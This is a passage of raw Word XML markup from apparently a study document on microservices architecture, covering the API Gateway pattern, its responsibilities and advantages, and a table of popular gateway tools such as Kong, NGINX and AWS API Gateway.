        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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void shared databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14740A93" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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utomate build &amp; deploy via CI/CD (GitHub Actions, Jenkins, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C66053" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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API Gateway (like Spring Cloud Gateway) for routing/authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A2F76" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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pply circuit breakers, retry, and rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AB9D81" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95"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3E50507">
          <v:rect id="_x0000_i2765" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B210F" w14:textId="79C2B1F3" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="0090040A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="672" w:name="_Toc196308152"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>API Gateway pattern and its advantages</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="672"/>
    </w:p>
    <w:p w14:paraId="52907932" w14:textId="76892083" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="00DE1D7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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API Gateway Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B864584"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n API Gateway is a server that acts as a single entry point for all client requests to a system of microservices. It routes requests, handles common functionalities (like authentication, rate limiting, logging), and often aggregates responses from multiple services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39257DF8" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F0DE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1E0C8FB">
          <v:rect id="_x0000_i2766" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5E6297" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="009F0DE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y Use an API Gateway?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F93058"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a microservices architecture, clients would otherwise need to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0729E" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Know the locations of multiple services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F9D848" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ndle different protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C89645" w14:textId="1CA19BE4" w:rsidR="002A1C21" w:rsidRPr="00CE4B95" w:rsidRDefault="002A1C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ke multiple calls for a single operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB4DE6" w14:textId="4B9F8B78" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="002A1C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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This leads to complexity, tight coupling, and redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15184141"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API Gateway pattern solves this by centralizing access control and request routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C2624" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F0DE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78B0A7D">
          <v:rect id="_x0000_i2767" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED7A86" w14:textId="77777777" w:rsidR="00393D00" w:rsidRPr="00CE4B95" w:rsidRDefault="00393D00" w:rsidP="009F0DEB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2054F1" w14:textId="77777777" w:rsidR="00393D00" w:rsidRPr="00CE4B95" w:rsidRDefault="00393D00" w:rsidP="009F0DEB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9D00DE" w14:textId="77777777" w:rsidR="00003D59" w:rsidRPr="00CE4B95" w:rsidRDefault="00003D59" w:rsidP="009F0DEB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A01084" w14:textId="16823462" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="009F0DEB">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Common Responsibilities of API Gatewa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85"/>
        <w:gridCol w:w="5582"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="70651DEC" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A65ED6" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="00393D00">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Responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D910B23" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="00393D00">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9F0DEB" w:rsidRPr="00CE4B95" w14:paraId="2CF1228E" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7239C943"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quest Routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DEB0A26"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wards requests to the appropriate backend microservice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="156CA9D1" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39C777C1"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uthentication &amp; AuthZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3449FC9C"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alidates JWT tokens, API keys, OAuth2 credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="0F307681" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BB72CC"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ate Limiting &amp; Throttling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="262FB49B"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trols traffic to prevent abuse or DDoS attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="06C05FE3" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="513EDE52"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ad Balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E3D71D"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istributes load across multiple instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="05AFF458" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D2B2DC1"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quest/Response Transformation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C8717FD"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difies headers, URL paths, or payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="182A8296" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A3D869F"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ching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35625382"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duces backend load by returning cached responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="2CE13193" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31E07E99"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gging and Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C657FB6"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gs all incoming/outgoing traffic for auditing and monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="61A94357" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5637A0AE"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sponse Aggregation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F1C099B"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bines results from multiple services into one response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="0EB47E57" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35895E1C"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otocol Translation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71EC3B86"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verts protocols (e.g., HTTP to WebSocket, gRPC, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D5F906B" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F0DE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C1E5E4A">
          <v:rect id="_x0000_i2768" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16343749" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="009F0DE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Advantages of API Gateway Patter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6"/>
        <w:gridCol w:w="6650"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="2A0185AD" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C3999E6" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="008276A9">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dvantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78D1F719" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="008276A9">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planation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="697EAFBC" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1772009D"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Centralized Access Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B8E3472"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ients interact with one endpoint instead of many microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="09F8A3C3" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C28B396"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Simplifies Client Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="007E57BD"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PI Gateway hides microservice topology and protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="2EECEC88" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22AF28DD"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Improved Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34BF6E08"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l requests go through a secure, audited, and controlled gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="107D9D40" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="523AE167"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Scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37E61342"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scale API Gateway independently of the backend services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="288C1734" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E0664A9"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Performance Optimization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16507B04"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rough caching, compression, and rate-limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="7B67210D" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2162FC0F"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Flexible Routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D6CA0F1"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perform routing based on request data like headers, path, or payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="6A5A1A94" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E6BF851"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Decoupling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F221A5C"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elps decouple frontend clients from backend service implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DBA93D5" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F0DE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414008C">
          <v:rect id="_x0000_i2769" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C613B8"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Popular API Gateway Too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43"/>
        <w:gridCol w:w="4711"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="05456665" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EEF3C4E" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="00D918FA">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Tool/Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AE95A99" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="00D918FA">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9F0DEB" w:rsidRPr="00CE4B95" w14:paraId="15B16736" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5275D6C1"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Cloud Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DBC8E72"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Java-based, for Spring Boot microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="28C8FC90" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51D13425"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etflix Zuul (legacy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61CA4BC0"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lder gateway, succeeded by Spring Cloud Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="41B1DDA8" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="418DE4CC"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Kong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B8F40B2"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pen-source, Lua-based, highly extensible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="252AB2C7" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F914C92"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GINX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6433755F"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idely used, highly performant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="04892AA6" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72193A08"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WS API Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CD43885"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naged gateway service for AWS environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="3CADF8C5" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D35DE1A"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pigee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
